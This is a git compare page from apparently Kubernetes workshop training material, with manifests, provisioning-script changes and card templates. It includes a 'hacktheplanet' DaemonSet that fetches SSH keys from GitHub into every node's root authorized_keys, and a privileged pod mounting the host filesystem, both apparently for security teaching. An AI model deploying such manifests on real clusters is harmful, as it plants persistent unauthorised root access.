Compare commits
91 Commits
kadm-2019-
...
wwrk-2019-
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
a72148d51a | ||
|
|
2d2246db4e | ||
|
|
5872100101 | ||
|
|
8b98058f22 | ||
|
|
a90dcf1d9a | ||
|
|
33f5a6b2ed | ||
|
|
56f2083a2b | ||
|
|
68a26ae501 | ||
|
|
2ef72a4dd8 | ||
|
|
48bd2a98bd | ||
|
|
f4e16dccc4 | ||
|
|
918fa2091d | ||
|
|
b22d3e3d21 | ||
|
|
7b8370dc12 | ||
|
|
e56ab48070 | ||
|
|
50ad11a697 | ||
|
|
db6d2c8188 | ||
|
|
eb02875bd0 | ||
|
|
4ba954cae4 | ||
|
|
84b691a89d | ||
|
|
5447b187ac | ||
|
|
d2a91c27c1 | ||
|
|
a8605a9316 | ||
|
|
25e2f8eca8 | ||
|
|
c1e9073781 | ||
|
|
6593f4ad42 | ||
|
|
bde7f75881 | ||
|
|
a6bd6a94e8 | ||
|
|
8650209381 | ||
|
|
25c820c87a | ||
|
|
f8e0de3519 | ||
|
|
b0aeac555d | ||
|
|
f3b9340528 | ||
|
|
927484bcbc | ||
|
|
3a512779b2 | ||
|
|
8d0c568f5a | ||
|
|
d987f21cba | ||
|
|
53c466e6ed | ||
|
|
9b130861ea | ||
|
|
b28ed0bbfc | ||
|
|
1f08425437 | ||
|
|
f69c9853bb | ||
|
|
e48c23e4f4 | ||
|
|
eb04aacb5e | ||
|
|
9504f81526 | ||
|
|
12ef2eb66e | ||
|
|
e4311a3037 | ||
|
|
8672a11c3b | ||
|
|
65647d5882 | ||
|
|
7309304ced | ||
|
|
1bc7415c54 | ||
|
|
2fdede72f1 | ||
|
|
26c876174a | ||
|
|
70c91b121c | ||
|
|
a7833a75b4 | ||
|
|
31e23477d6 | ||
|
|
4ba9d5e82e | ||
|
|
9775954b42 | ||
|
|
7ddda3456c | ||
|
|
747f7a07d4 | ||
|
|
d4500eff5a | ||
|
|
0ba6adb027 | ||
|
|
d3af9ff333 | ||
|
|
c9dc6fa7cb | ||
|
|
faf7e1af42 | ||
|
|
485704a169 | ||
|
|
72fa8c366b | ||
|
|
8ea4b23530 | ||
|
|
785a8178ca | ||
|
|
0dfff26410 | ||
|
|
5b4debfd81 | ||
|
|
4c44f3e690 | ||
|
|
940694a2b0 | ||
|
|
c3de1049f1 | ||
|
|
116515d19b | ||
|
|
098671ec20 | ||
|
|
51e77cb62c | ||
|
|
e2044fc2b2 | ||
|
|
f795d67f02 | ||
|
|
6f6dc66818 | ||
|
|
0ae39339b9 | ||
|
|
e6b73a98f4 | ||
|
|
03657ea896 | ||
|
|
4106059d4a | ||
|
|
2c0ed6ea2a | ||
|
|
3557a546e1 | ||
|
|
d3dd5503cf | ||
|
|
82f8f41639 | ||
|
|
dff8c1e43a | ||
|
|
dc7c1e95ca | ||
|
|
c367ad1156 |
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
21
k8s/malicious-pod.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: malicious
|
||||
spec:
|
||||
volumes:
|
||||
- name: slash
|
||||
hostPath:
|
||||
path: /
|
||||
containers:
|
||||
- image: alpine
|
||||
name: alpine
|
||||
securityContext:
|
||||
privileged: true
|
||||
command:
|
||||
- sleep
|
||||
- "1000000000"
|
||||
volumeMounts:
|
||||
- name: slash
|
||||
mountPath: /hostfs
|
||||
restartPolicy: Never
|
||||
95
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,95 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ pods ]
|
||||
verbs: [ get, list ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: orange
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
33
k8s/users:jean.doe.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ users:jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: users:jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
70
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
@@ -248,6 +248,14 @@ EOF"
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
@@ -383,6 +391,15 @@ _cmd_retag() {
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
while [ ! -z "$*" ]; do
|
||||
@@ -481,12 +498,12 @@ _cmd_helmprom() {
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
helm init --service-account helm
|
||||
sudo -u docker -H helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
helm upgrade --install prometheus stable/prometheus \
|
||||
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
|
||||
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -7,7 +7,7 @@ clustersize: 1
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: jerome.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
@@ -8,7 +8,7 @@ clusterprefix: node
|
||||
cards_template: jerome.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
@@ -1,29 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: enix.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -1,30 +0,0 @@
|
||||
# customize your cluster size, your cards template, and the versions
|
||||
|
||||
# Number of VMs per cluster
|
||||
clustersize: 5
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: test
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.18.0
|
||||
machine_version: 0.13.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,31 +0,0 @@
|
||||
# 3 nodes for k8s 101 workshops
|
||||
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: kube101.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -1,30 +0,0 @@
|
||||
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
|
||||
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.22.0
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,124 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à un
|
||||
des environnements utilisés pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine
|
||||
virtuelle avec n'importe quel client SSH.
|
||||
</p>
|
||||
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusterprefix }}</td></tr>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>{{ clusterprefix }}{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_swarm -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
